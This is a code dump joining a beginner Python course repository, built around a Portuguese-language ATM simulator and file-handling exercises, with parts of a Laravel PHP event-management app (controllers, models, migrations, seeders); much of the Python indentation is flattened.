while line.find(';')!= -1:
semicolon_pos=line.find(';')
money_bill_value=line[0:semicolon_pos]
set_money_bill_value(money_bill_value)
if semicolon_pos +1==len(line):
break
else:
line=line[semicolon_pos+1:len(line)]
def set_money_bill_value(money_bill_value):
equal_pos=money_bill_value.find('=')#20=10
money_bill=money_bill_value[0:equal_pos]
count_money_bill_value=len(money_bill_value)
value=money_bill_value[equal_pos+1:count_money_bill_value]
print(money_bill,value)
money_slips[money_bill]=int(value)
def load_bank_data():
    file=open_file_bank('r')
    read_money_slips(file)
    file.close()
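read_money_slips walks the serialized line with find(';') by hand; the same `bill=value;` format can be parsed more directly with split. A standalone Python sketch (not the project's actual helper):

```python
def parse_money_slips(line):
    # "20=5;50=5;100=5;" -> {"20": 5, "50": 5, "100": 5}
    slips = {}
    for entry in line.split(';'):
        if not entry:
            continue  # skip the empty piece after the trailing ';'
        bill, value = entry.split('=')
        slips[bill] = int(value)
    return slips
```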
<file_sep>import os
#GET BASE PATH OF PROJECT
BASE_PATH=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
print(BASE_PATH)
#file=open(BASE_PATH+'/_file_test.dat','w') #write
#file.write('Marcos\tRoberto\n')
#file.write('Silvestrini')
#file.close()
# file=open(BASE_PATH+'/_file_test.dat','a') #append
# file.write('Marcos\tRoberto\n')
# file.write('Silvestrini\n')
# file.writelines(('test1','test2','test2','test2\n'))
# file.writelines(['test1','test2','test2','test2\n'])
# file.close()
file=open(BASE_PATH+'/_file_test.dat','r') #read
# print(file.read())
# print('\n')
# print(file.read(10))
# print(file.readline())
# print(file.readline(6))
# print(file.readline(2))
# print(file.readline())
#lines=file.readlines()
#for line in lines:
# print(line)
line=file.readline()
while line:
    print(line)
    line=file.readline()
file.close()<file_sep>import os
def header ():
print(" ")
print("***********************************************************")
print("********** School of Net - Caixa Eletronico *************")
print("***********************************************************")
print(" ")
def clear():
clear= 'cls' if os.name=='nt' else 'clear'
os.system(clear)
def pause():
input("Pressione <ENTER> para Continuar...")
<file_sep>import os
print(' ')
print(os.path.abspath('.'))
print(os.path.abspath('..'))
print(os.path.abspath('./test/test_path.py'))
print(os.path.abspath('./test'))
print(' ')
path_test_file=os.path.abspath('./test/test_path.py')
print(path_test_file)
print(os.path.dirname(path_test_file))
print(os.path.exists(path_test_file +'test'))
print(os.path.isfile(path_test_file))
print(os.path.isdir(path_test_file))
print(' ')
print(__file__)
print(os.path.abspath(__file__))
path=(os.path.dirname(os.path.abspath(__file__)))
print(path)
BASE_PATH=os.path.abspath(path)
print(BASE_PATH)<file_sep># course_python
Course Python School Of Net
<file_sep>from modules import utils
from modules import operations
#from modules.bank_account_variables import money_slips
#from modules.open_file_bank import load_bank_data
def main():
#load_bank_data()
#print(money_slips)
utils.header()
account_auth=operations.auth_account()
if account_auth:
utils.clear()
utils.header()
option_typed=operations.get_menu_options_typed(account_auth)
operations.do_operation(option_typed,account_auth)
else:
print("Conta Invalida, Tente Novamente!")
while True:
main()
utils.pause()
utils.clear() <file_sep>def call_numbers():
for number in range(0,10):
print(number)
def call_numbers_with_limit(limit):
    for number in range(limit):
        print(number)
#call_numbers()
call_numbers_with_limit(5)
def sum(x=0,y=0):
return x+y
def sub (x=0,y=0):
return x-y
def mult (x=0,y=0):
return x*y
def div (x,y):
if(y<1):
return 0
return x/y
print(sum(x=10,y=7))
print(sum())
print(div(x=-1,y=0))
print(div(x=50,y=3))
<file_sep>#from modules import bank_account_variables
import getpass
from bank_account_variables import accounts_list,money_slips
def do_operation(option_typed,account_auth):
if(option_typed == '1'):
show_balance(account_auth)
elif option_typed == '9' and accounts_list[account_auth]['admin']:
show_money_slips()
elif option_typed == '10' and accounts_list[account_auth]['admin']:
insert_money_slips()
elif option_typed == '2':
withdraw()
else:
print("Opção Invalida!")
def show_balance(account_auth):
print("Seu saldo é %s" % accounts_list[account_auth]['value'])
def show_money_slips():
print("Celulas Disponiveis no Caixa")
print(money_slips)
def insert_money_slips():
amount_typed=input("Digite a Quantidade de Cedulas: ")
money_bill_typed=input("Digite a Cedulas a ser Incluida: ")
money_slips[money_bill_typed]+=int(amount_typed)
print(money_slips)
def withdraw():
value_typed=input("Digite o Valor a ser Sacado: ")
money_slips_user={}
value_int=int(value_typed)
if value_int // 100 > 0 and value_int // 100 <= money_slips['100']:
money_slips_user['100']=value_int // 100
value_int=value_int - value_int // 100 * 100
if value_int // 50 > 0 and value_int // 50 <= money_slips['50']:
money_slips_user['50']=value_int // 50
value_int=value_int - value_int // 50 * 50
if value_int // 20 > 0 and value_int // 20 <= money_slips['20']:
money_slips_user['20']=value_int // 20
value_int=value_int - value_int // 20 * 20
if value_int != 0:
print("Cedulas indisponiveis para este Valor.")
print("Cedulas Disponiveis: 100,50,20")
else:
for money_bill in money_slips_user:
money_slips[money_bill]-=money_slips_user[money_bill]
print("Pegue as notas")
print(money_slips_user)
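The cascade above takes each denomination greedily (100s, then 50s, then 20s) and aborts when a remainder is left over. A standalone Python sketch of the same idea — note this variant caps each bill at the available count with `min`, slightly more forgiving than the all-or-nothing checks above:

```python
def break_into_bills(value, available):
    # Greedily split `value` into 100/50/20 bills, limited by `available`.
    # Returns a {bill: count} dict, or None when the exact value cannot
    # be formed -- mirroring the "Cedulas indisponiveis" branch above.
    taken = {}
    for bill in (100, 50, 20):
        count = min(value // bill, available.get(str(bill), 0))
        if count > 0:
            taken[str(bill)] = count
            value -= count * bill
    return taken if value == 0 else None
```

For example, 170 splits into one bill of each denomination, while 30 is rejected because no 10-unit bill exists.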
def auth_account():
account_typed=input('Digite o Numero da Conta: ')
password_typed=getpass.getpass('Digite sua Senha: ')
if account_typed in accounts_list and password_typed == accounts_list[account_typed]['password']:
return account_typed
else:
return False
def get_menu_options_typed(account_auth):
print("1 - Saldo")
print("2 - Saque")
if accounts_list[account_auth]['admin']:
print("9 - Mostar Cedulas")
print("10 - Incluir Cedulas")
return input("Escolha umas das opções acima: ")<file_sep>'''
This is a comment in Python
'''
number=5
while number < 10:
print(number)
number+=1
if number == 8:
print("Break")
break
<file_sep>list=[1,4,6,8,10,12,14]
for item in list[0:3]:
if item >2:
print(item)
list2=["Marcos", "Roberto","Abreu"]
for name in list2:
if name == "Abreu":
print(name)
<file_sep>total=100
if total > 100:
print('Greater than 100')
elif total < 100:
print('Other condition')
else:
print("Error")<file_sep>def say_hello():
return "<NAME>"
print (say_hello())
<file_sep>#Imports Libs
import getpass
import os
accounts_list={
'0001-01':{
'password':'123',
'name':'<NAME>',
'value':'10.560',
'admin':False
},
'0001-02':{
'password':'987',
'name':'<NAME>',
'value':'10.560',
'admin':False
},
'1111-11':{
'password':'123',
'name':'Admin',
'value':'1000',
'admin':True
}
}
money_slips={
'20':5,
'50':5,
'100':5
}
while True:
print(" ")
print("***********************************************************")
print("********** School of Net - Caixa Eletronico *************")
print("***********************************************************")
print(" ")
#Dados da Conta
account_typed=input('Digite o Numero da Conta: ')
password_typed=getpass.getpass('Digite sua Senha: ')
#Dicionario de Contas
#Validando Conta com Uso de Dicionario
if account_typed in accounts_list and password_typed == accounts_list[account_typed]['password']:
os.system('cls' if os.name=='nt' else 'clear')
print("***********************************************************")
print("********** School of Net - Caixa Eletronico *************")
print("***********************************************************")
print("1 - Saldo")
print("2 - Saque")
if accounts_list[account_typed]['admin']:
print("9 - Mostar Cedulas")
print("10 - Incluir Cedulas")
option_typed=input("Escolha umas das opções acima: ")
if(option_typed == '1'):
print("Seu saldo é %s" % accounts_list[account_typed]['value'])
elif option_typed == '9' and accounts_list[account_typed]['admin']:
print(money_slips)
elif option_typed == '10' and accounts_list[account_typed]['admin']:
amount_typed=input("Digite a Quantidade de Cedulas: ")
money_bill_typed=input("Digite a Cedulas a ser Incluida: ")
money_slips[money_bill_typed]+=int(amount_typed)
print(money_slips)
elif option_typed == '2':
value_typed=input("Digite o Valor a ser Sacado: ")
money_slips_user={}
value_int=int(value_typed)
if value_int // 100 > 0 and value_int // 100 <= money_slips['100']:
money_slips_user['100']=value_int // 100
value_int=value_int - value_int // 100 * 100
if value_int // 50 > 0 and value_int // 50 <= money_slips['50']:
money_slips_user['50']=value_int // 50
value_int=value_int - value_int // 50 * 50
if value_int // 20 > 0 and value_int // 20 <= money_slips['20']:
money_slips_user['20']=value_int // 20
value_int=value_int - value_int // 20 * 20
if value_int != 0:
print("Cedulas indisponiveis para este Valor.")
print("Cedulas Disponiveis: 100,50,20")
else:
for money_bill in money_slips_user:
money_slips[money_bill]-=money_slips_user[money_bill]
print("Pegue as notas")
print(money_slips_user)
else:
print("Opção Invalida!")
else:
print("Conta Invalida, Tente Novamente!")
input("Pressione <ENTER> para Continuar...")
os.system('cls' if os.name=='nt' else 'clear') <file_sep>cars={}
cars['corola']="red"
cars['fir']="green"
cars['320']="black"
print(cars.keys())
print(cars.values())
print(cars['corola'])
people=dict(Joao='Father',Maria='Mother',Juca='daugther')
if('Juca' in people):
print(people['Juca'])
print(people)
family = {
'Carlos':'Father'
}
print(family)
funcionario={
}
|
36e2f6120931e3f68dc35a2030688cac5c388712
|
[
"Markdown",
"Python"
] | 15 |
Python
|
mrsilvestrini/course_python
|
29d9d706be3dfd47e8212f302355a4055b926427
|
cc2a124890a6fe2926ee7617ef998df70ba07075
|
refs/heads/main
|
<repo_name>MarkPowellDev/python-code<file_sep>/hello_world/hello_variables.py
name = 'mark'
age = 31
is_registered = True
print(name)
print(age)
print(is_registered)<file_sep>/flow_control/if.py
number = 17
green = True
red = False
if number <= 15:
if green is False:
if red is True:
print('Go')
else:
print('red is wrong, green is right')
else:
print('red is wrong, green is wrong')
else:
print('red is wrong, green is wrong, number is less than 17')
<file_sep>/flow_control/for_loops.py
import math
print(f'pi = {math.pi:.3f}.')
for y in range(1, 11):
print('{} '.format(y))
print('---------- b -------------')
for b in range(1, 11):
print('b',b)
print('---------- a -------------')
count = 1
for a in range(1, 11):
print(f'a', "_", count)
count += 1
print('---------- x -------------')
for x in range(1, 11):
print('{0:2d} {1:3d} {2:6d}'.format(x, x*x, x*x*x))
print('---------- c -------------')
for c in range(0, 11):
print('c', c)
print('---------- d -------------')
for d in range(5, 11):
print('d', d)
print('---------- i -------------')
for i in range(5):
print(i)
# message1 = 'Hello Again {} ({})'.format(name, age)
<file_sep>/strings/format_functions.py
"""
Sample code of string concatenation
"""
name = 'Mark'
age = 31
message = 'Hello ' + name + ' (' + str(age) + ')'
message1 = 'Hello Again {} ({})'.format(name, age)
print(message)
print(message1)
<file_sep>/flow_control/for_statements.py
# Measure some strings:
words = ['cat', 'window', 'dog']
for w in words:
print(w, len(w), '<---- The number of chars in the word')
#range with len
a = ['Mary', 'had', 'a', 'little', 'lamb']
for i in range(len(a)):
print(i, a[i])
for i in range(0, 10, 3):
print(i)
xx = sum(range(4))
print(xx, 'sum of range')
<file_sep>/strings/string_literals.py
name = 'Mark'
age = 31
message2 = f'Hello Again 3 {name} ({age})'
print(message2)
|
11bbc0259b79349605e1edf52e837d80c46aa83f
|
[
"Python"
] | 6 |
Python
|
MarkPowellDev/python-code
|
4aad541e2c7848662c19cc34b508b35991c91568
|
1af4399335d2d5653865f0041f87d78caa5ae4fb
|
refs/heads/master
|
<repo_name>seagullbird/cc-2019-team<file_sep>/src/main/java/io/vertx/starter/Q2Tweet.java
package io.vertx.starter;
import org.json.JSONObject;
public class Q2Tweet {
private Long senderUid;
private Long tweetId;
private Long targetUid;
private JSONObject hashTags;
private Long createdAt;
private String text;
public Q2Tweet(
Long senderUid,
Long tweetId,
Long targetUid,
JSONObject hashTags,
Long createdAt,
String text) {
this.senderUid = senderUid;
this.tweetId = tweetId;
this.targetUid = targetUid;
this.hashTags = hashTags;
this.createdAt = createdAt;
this.text = text;
}
public Long getSenderUid() {
return senderUid;
}
public Long getTweetId() {
return tweetId;
}
public Long getTargetUid() {
return targetUid;
}
public JSONObject getHashTags() {
return hashTags;
}
public Long getCreatedAt() {
return createdAt;
}
public String getText() {
return text;
}
}
<file_sep>/src/main/java/io/vertx/starter/DBVerticle.java
package io.vertx.starter;
import io.vertx.core.AbstractVerticle;
import io.vertx.core.eventbus.Message;
import io.vertx.core.json.JsonObject;
import io.vertx.core.logging.Logger;
import io.vertx.core.logging.LoggerFactory;
abstract class DBVerticle extends AbstractVerticle {
enum ErrorCodes {
NO_ACTION_SPECIFIED,
BAD_ACTION,
DB_ERROR
}
static final Logger LOGGER = LoggerFactory.getLogger(DBMySqlVerticle.class);
void onMessage(Message<JsonObject> message) {
if (!message.headers().contains("action")) {
message.fail(ErrorCodes.NO_ACTION_SPECIFIED.ordinal(), "No action header specified");
return;
}
String action = message.headers().get("action");
switch (action) {
case "words":
fetchQ3Words(message);
break;
case "texts":
fetchQ3Texts(message);
break;
case "q2":
fetchQ2(message);
break;
default:
message.fail(ErrorCodes.BAD_ACTION.ordinal(), "Bad action: " + action);
}
}
void reportQueryError(Message<JsonObject> message, Throwable cause) {
LOGGER.error("Database query error", cause);
message.fail(DBMySqlVerticle.ErrorCodes.DB_ERROR.ordinal(), cause.getMessage());
}
abstract void fetchQ2(Message<JsonObject> message);
abstract void fetchQ3Texts(Message<JsonObject> message);
abstract void fetchQ3Words(Message<JsonObject> message);
}
<file_sep>/src/main/resources/hbase.properties
hbase.zookeeper.quorum = 10.0.0.7,10.0.0.9,10.0.0.10
hbase.zookeeper.property.clientport = 2181
hbase.cluster.distributed = true
hbase.zookeeper.znode.parent = /hbase-unsecure
<file_sep>/src/main/java/io/vertx/starter/Q2User.java
package io.vertx.starter;
import org.json.JSONObject;
public class Q2User {
private Long userId;
private String description;
private String screenName;
private JSONObject hashtags;
private double finalScore;
private String latestContent;
public Q2User(Long userId, String screenName, String description, JSONObject hashtags) {
this.userId = userId;
this.description = description;
this.screenName = screenName;
this.hashtags = hashtags;
this.finalScore = 0.0;
}
public Long getUserId() {
return userId;
}
public String getDescription() {
return description;
}
public String getScreenName() {
return screenName;
}
public JSONObject getHashtags() {
return hashtags;
}
public void setFinalScore(double finalScore) {
this.finalScore = finalScore;
}
public double getFinalScore() {
return finalScore;
}
public String getLatestContent() {
return latestContent;
}
public void setLatestContent(String latestContent) {
this.latestContent = latestContent;
}
public String toString() {
return String.join("-", userId.toString(), description, screenName, hashtags.toString());
}
}
<file_sep>/src/main/java/io/vertx/starter/Q1Transaction.java
package io.vertx.starter;
import java.math.BigInteger;
import java.util.StringJoiner;
class Q1Transaction {
Long recv;
Long amt;
String time;
String hash;
Long send;
Long fee;
BigInteger sig;
String calcHash() {
StringJoiner sj = new StringJoiner("|");
sj.add(String.valueOf(time));
if (send != null) sj.add(String.valueOf(send));
else sj.add("");
sj.add(String.valueOf(recv));
sj.add(String.valueOf(amt));
if (fee != null) sj.add(String.valueOf(fee));
else sj.add("");
return OGCoin.ccHash(sj.toString());
}
boolean verifySig() {
if (sig == null) return true;
long n = send;
long txHashInt = Long.parseLong(hash, 16);
return BigInteger.valueOf(txHashInt)
.equals(sig.modPow(BigInteger.valueOf(OGCoin.key_e), BigInteger.valueOf(n)));
}
void sign() {
long txHashInt = Long.parseLong(hash, 16);
sig =
BigInteger.valueOf(txHashInt)
.modPow(BigInteger.valueOf(OGCoin.key_d), BigInteger.valueOf(OGCoin.key_n));
}
}
<file_sep>/src/main/java/io/vertx/starter/DBHBaseVerticle.java
package io.vertx.starter;
import io.vertx.core.Promise;
import io.vertx.core.eventbus.Message;
import io.vertx.core.json.JsonObject;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Get;
import org.apache.hadoop.hbase.client.Result;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.util.Bytes;
import org.json.JSONArray;
public class DBHBaseVerticle extends DBVerticle {
static final String queueName = "hbase.queue";
/** set the private IP address(es) of HBase zookeeper nodes. */
private final String zkPrivateIPs = "172.31.17.44";
/** The name of your HBase table. */
private final TableName tableName = TableName.valueOf("twitter");
/** HTable handler. */
private Table bizTable;
/** HBase connection. */
private Connection conn;
/** Byte representation of column family. */
private final byte[] q2BColFamily = Bytes.toBytes("q2");
private final byte[] q3BColFamily = Bytes.toBytes("q3");
@Override
public void start(Promise<Void> promise) throws Exception {
Configuration conf = HBaseConfiguration.create();
conf.set("hbase.zookeeper.quorum", zkPrivateIPs);
conf.set("hbase.master", zkPrivateIPs + ":14000");
conf.set("hbase.zookeeper.property.clientport", "2181");
conf.set("hbase.regionserver.handler.count", "60");
try {
conn = ConnectionFactory.createConnection(conf);
bizTable = conn.getTable(tableName);
} catch (Exception e) {
LOGGER.error(e);
e.printStackTrace();
}
vertx.eventBus().consumer(queueName, this::onMessage);
promise.complete();
}
@Override
void fetchQ2(Message<JsonObject> message) {
JsonObject request = message.body();
long reqUser = request.getLong("user");
byte[] descriptionCol = Bytes.toBytes("description");
byte[] screenNameCol = Bytes.toBytes("screen_name");
byte[] hashtagsCol = Bytes.toBytes("hashtags");
byte[] recordsCol = Bytes.toBytes("records");
Get get = new Get(Bytes.toBytes(String.valueOf(reqUser)));
get.addColumn(q2BColFamily, descriptionCol);
get.addColumn(q2BColFamily, screenNameCol);
get.addColumn(q2BColFamily, hashtagsCol);
get.addColumn(q2BColFamily, recordsCol);
try {
Result rs = bizTable.get(get);
JsonObject result = new JsonObject();
result.put("description", Bytes.toString(rs.getValue(q2BColFamily, descriptionCol)));
result.put("screen_name", Bytes.toString(rs.getValue(q2BColFamily,screenNameCol)));
result.put("hashtags", Bytes.toString(rs.getValue(q2BColFamily, hashtagsCol)));
result.put("records", (Bytes.toString(rs.getValue(q2BColFamily, recordsCol))));
message.reply(result);
} catch (Exception e) {
reportQueryError(message, e);
}
}
@Override
void fetchQ3Words(Message<JsonObject> message) {
JsonObject request = message.body();
}
@Override
void fetchQ3Texts(Message<JsonObject> message) {
JsonObject request = message.body();
}
}
|
c969b923e1f356ff96183a968ca99db7bfeb999b
|
[
"Java",
"INI"
] | 6 |
Java
|
seagullbird/cc-2019-team
|
c5ec99523e73ff337afa7db8bd177735f7add5d8
|
e3d92501efb8e5f2512ec61d84429224793fca34
|
refs/heads/master
|
<repo_name>xunmi67/wsc_pc<file_sep>/huaweiOJ/cont_sort.cpp
#include <iostream>
#include <cstdio>
#include <cctype>
#include <cstdlib>
#include <cstring>
using namespace std;
static void init(char* str, int* alp_count, int* pos);
void count_sort(char* str, char *after);
static void insert(char *str, char *after, int *pos);
#define get_low(a) (((a) <= 'Z' && (a) >= 'A') ? ('a' + (a) - 'A') : (a))
/* pos[count_of_nonalpha] must also be valid: init() stores strlen(str) there so insert() can detect the end of the positions. */
static void init(char* str, int* alp_count, int* pos){
int i = 0;
int j = 0;//records each non-alpha position
while (str[i] != '\0'){
if (isalpha(str[i])){
alp_count[get_low(str[i]) - 'a']++;
}
else{
pos[j++] = i;
}
i++;
}
int previous = alp_count[0];
alp_count[0] = 0;
int temp = 0;
for (i = 1; i < 26; i++){
temp = alp_count[i];
alp_count[i] = alp_count[i - 1]+previous;
previous = temp;
}
pos[j] = strlen(str);//prepare for insert()
}
/*---------------below are test functions---------------*/
void test_init(){
char * str = "avc def Asss ";
int alp_count[26] = { 0 };
int *pos = (int*)calloc((strlen(str) + 1),sizeof(int));
init(str, alp_count, pos);
printf("a:%d,c:%d,d:%d,s:%d", alp_count[0], alp_count['c' - 'a'], alp_count['d' - 'a'], alp_count['s' - 'a']);
free(pos);
}
int main(int argc, char **argv){
test_init();
getchar();
return 0;
}
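The file above declares `count_sort()` and `insert()` but never defines them; only `init()` (the bucket-counting and prefix-sum step) is written. A minimal sketch of what the sort could look like, assuming the intent is to order letters case-insensitively while leaving non-alphabetic characters at their original indices — the `std::string` interface and internal names here are assumptions, not the original author's code:

```cpp
#include <cctype>
#include <string>
#include <vector>

// Hypothetical completion of the declared-but-undefined count_sort():
// sorts the letters of `str` case-insensitively (stable), leaving every
// non-alphabetic character at its original index.
std::string count_sort(const std::string &str) {
    std::vector<std::string> bucket(26);   // letters grouped by lowercase value
    std::vector<size_t> alphaPos;          // indices that held a letter
    for (size_t i = 0; i < str.size(); i++) {
        unsigned char c = static_cast<unsigned char>(str[i]);
        if (std::isalpha(c)) {
            bucket[std::tolower(c) - 'a'].push_back(str[i]);
            alphaPos.push_back(i);
        }
    }
    std::string out = str;                 // non-alpha chars stay put
    size_t k = 0;
    for (const std::string &b : bucket)
        for (char c : b)
            out[alphaPos[k++]] = c;        // refill letter slots in sorted order
    return out;
}
```

With the test string from `test_init()`, `count_sort("avc def Asss ")` keeps both spaces in place and yields `"aAc def sssv "` (stable, so `a` precedes `A`).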
|
72f3db81b3b474fad167e67f5197a5325fa074a8
|
[
"C++"
] | 1 |
C++
|
xunmi67/wsc_pc
|
7d206ca511fd46faf610c7448348c89e566a1efa
|
a15ef4c2ac9a5dd9fb217fa3dc9f7779b56048f0
|
refs/heads/master
|
<file_sep><?php
class BaseController extends Controller {
/**
* Message bag.
*
* @var Illuminate\Support\MessageBag
*/
protected $messageBag = null;
/**
* Breadcrumbs
*
* @var array
*/
protected $breadcrumbs = array();
/**
* Title
*
* @var string
*/
protected $title = '';
/**
* User
*
* @var User
*/
protected $user = null;
/**
* Which model to check against
* @var string
*/
protected $checkModel = '';
/**
* Which column to check for availability.
* @var string
*/
protected $checkColumn = 'name';
/**
* Which formfield to compare with on update.
* @var string
*/
protected $checkCompare = 'old';
/**
* Which Lang::get() message to display on error.
* @var string
*/
protected $checkMessage = 'false';
/**
* Initializer.
*
* @return void
*/
public function __construct()
{
// CSRF Protection
$this->beforeFilter('csrf', array('on' => 'post'));
//
$this->messageBag = new Illuminate\Support\MessageBag;
// Create user if available
if (Sentry::check())
{
try
{
$this->user = Sentry::getUser();
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
return Redirect::action('HomeController@index')->with('error', 'Access denied');
}
View::share('currentUser', $this->user);
}
}
/**
* Setup the layout used by the controller.
*
* @return void
*/
protected function setupLayout()
{
if ( ! is_null($this->layout))
{
$this->layout = View::make($this->layout);
}
}
public function getUser()
{
return $this->user;
}
/**
* Checks to see if a given resource exists in the database. Used by form validation.
*
* @return Response
*/
public function check()
{
try {
switch($this->checkModel) {
case 'ProfileField':
$resource = ProfileField::where($this->checkColumn, '=', Input::get($this->checkColumn))->firstOrFail();
break;
case 'Venue':
$resource = Venue::where($this->checkColumn, '=', Input::get($this->checkColumn))->firstOrFail();
break;
case 'ConEvent':
$resource = ConEvent::where($this->checkColumn, '=', Input::get($this->checkColumn))->firstOrFail();
break;
case 'user':
$resource = Sentry::findUserByLogin(Input::get($this->checkColumn));
break;
default:
throw new Exception('Model not found');
}
if (Input::has($this->checkCompare) && trim(Input::get($this->checkCompare)) === trim($resource->{$this->checkColumn}))
{
return Response::json(true);
}
return Response::json(Lang::get($this->checkMessage));
}
catch (Exception $e)
{
return Response::json(true);
}
}
}
<file_sep><?php
class OldConEventsController extends BaseController {
/**
* ConEvent Repository
*
* @var ConEvent
*/
protected $ConEvent;
public function __construct(ConEvent $ConEvent)
{
$this->ConEvent = $ConEvent;
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$events = $this->ConEvent->all();
return View::make('events.index', compact('events'));
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
return View::make('events.create');
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
$input = Input::all();
$validation = Validator::make($input, ConEvent::$rules);
if ($validation->passes())
{
$this->ConEvent->create($input);
return Redirect::route('events.index');
}
return Redirect::route('events.create')
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$event = $this->ConEvent->findOrFail($id);
return View::make('events.show', compact('event'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$event = $this->ConEvent->find($id);
if (is_null($event))
{
return Redirect::route('events.index');
}
return View::make('events.edit', compact('event'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), '_method');
$validation = Validator::make($input, ConEvent::$rules);
if ($validation->passes())
{
$ConEvent = $this->ConEvent->find($id);
$ConEvent->update($input);
return Redirect::route('events.show', $id);
}
return Redirect::route('events.edit', $id)
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
$this->ConEvent->find($id)->delete();
return Redirect::route('events.index');
}
}
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class CreateProfileDataTable extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::create('profile_data', function(Blueprint $table) {
$table->increments('id');
$table->integer('profile_field_id');
$table->integer('user_id');
$table->text('value');
$table->enum('visibility', array('private', 'public'))->default('public');
$table->timestamps();
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::drop('profile_data');
}
}
<file_sep><?php
class Activity extends BaseModel
{
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'description' => 'required',
'starts_at' => 'required',
'ends_at' => 'required',
'con_event_id' => 'required',
'capacity' => 'required|integer|min:0',
);
public function event()
{
return $this->belongsTo('ConEvent', 'con_event_id');
}
public function category()
{
return $this->belongsTo('ActivityCategory', 'activity_category_id');
}
public function room()
{
return $this->belongsTo('Room');
}
public function participants()
{
// $participants = $this->belongsToMany('User')->with('host')->get();
// return $this->belongsToMany('User')->withPivot('host');
return $this->belongsToMany('User');
}
public function hosts()
{
return $this->belongsToMany('User')->withPivot('host');
}
public function getDuration($human = true)
{
$diff = $this->starts_at->diffInMinutes($this->ends_at);
if ($diff % 15 !== 0) {
// $diff = round($diff/10)*10;
$diff = ceil($diff / 15)*15;
// dd($diff);
}
if (!$human) {
return $diff;
}
$readable = array();
if ($diff >= 60) {
$readable[] = floor($diff / 60) . 'h';
}
if ($diff % 60) {
$readable[] = $diff % 60 . 'min';
}
return implode(' ', $readable);
}
public function getRoomName()
{
if ($this->all_rooms)
{
$room_name = strtolower(Lang::get('labels.all_rooms'));
}
elseif($this->room)
{
$room_name = $this->room->name;
}
else
{
$room_name = '';
}
return $room_name;
}
public function signupCapacity()
{
return floor($this->event->signup_limit * $this->capacity);
}
public function getPlacesLeft()
{
return $this->capacity - $this->participants->count();
}
public function hasPlacesLeft()
{
return ($this->signupCapacity() - $this->participants->count()) > 0;
}
static function getForDate($date, $event)
{
$activities = Activity::where('starts_at', '>=', $date->format('Y-m-d 00:00:00'))
->where('starts_at', '<', $date->copy()->addDay()->format('Y-m-d 00:00:00'))
->where('con_event_id', '=', $event->id)
->orderBy('starts_at', 'asc')
->orderBy('room_id', 'asc')
->get();
return $activities;
}
public function getStartsAtAttribute($value)
{
return \Carbon\Carbon::createFromFormat('Y-m-d H:i:s', $value);
}
public function getEndsAtAttribute($value)
{
return \Carbon\Carbon::createFromFormat('Y-m-d H:i:s', $value);
}
}
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class AddHostsIndexToActivities extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::table('activities', function(Blueprint $table) {
$table->string('hosts')->nullable();
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::table('activities', function(Blueprint $table) {
$table->dropColumn('hosts');
});
}
}
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class AddVisibilityToConEvents extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::table('con_events', function(Blueprint $table) {
$table->enum('visibility', array('private', 'public'))->default('public');
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::table('con_events', function(Blueprint $table) {
$table->dropColumn('visibility');
});
}
}
<file_sep><?php
class DatabaseSeeder extends Seeder {
/**
* Run the database seeds.
*
* @return void
*/
public function run()
{
Eloquent::unguard();
// $this->call('UserTableSeeder');
// $this->call('ConeventsTableSeeder');
// $this->call('VenuesTableSeeder');
// $this->call('ActivitiesTableSeeder');
// $this->call('RoomsTableSeeder');
// $this->call('FeaturesTableSeeder');
$this->call('CountriesTableSeeder');
// $this->call('UsersTableSeeder');
$this->call('GroupsTableSeeder');
}
}
<file_sep><?php
class VenuesTableSeeder extends Seeder {
public function run()
{
// Uncomment the below to wipe the table clean before populating
// DB::table('venues')->truncate();
$venues = array(
);
// Uncomment the below to run the seeder
// DB::table('venues')->insert($venues);
}
}
<file_sep><?php
class Room extends BaseModel {
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'description' => 'required',
'capacity' => 'required|integer',
'venue_id' => 'required'
);
public function venue()
{
return $this->belongsTo('Venue');
}
public function activities()
{
return $this->hasMany('Activity');
}
}
<file_sep><?php
return array(
// General stuff
"base_title" => "Admin",
"admin_intro" => "Select which resource to manage in the menu above or among the buttons below.",
"title" => "Admin",
"show" => "View",
"create" => "Add",
"edit" => "Edit",
"destroy" => "Delete",
"import" => "Import",
"export" => "Export",
"invite" => "Invite",
'public' => 'Public',
);
<file_sep><?php
class AdminProfileFieldsController extends BaseController {
/**
* ProfileField Repository
*
* @var ProfileField
*/
protected $profileField;
public function __construct(ProfileField $profileField)
{
$this->profileField = $profileField;
$types = array(
'string' => Lang::get('labels.type.string'),
'text' => Lang::get('labels.type.text'),
'option' => Lang::get('labels.type.option'),
'checkbox' => Lang::get('labels.type.checkbox'),
'select' => Lang::get('labels.type.select'),
'multi' => Lang::get('labels.type.multi'),
// 'relation' => Lang::get('labels.type.relation'),
);
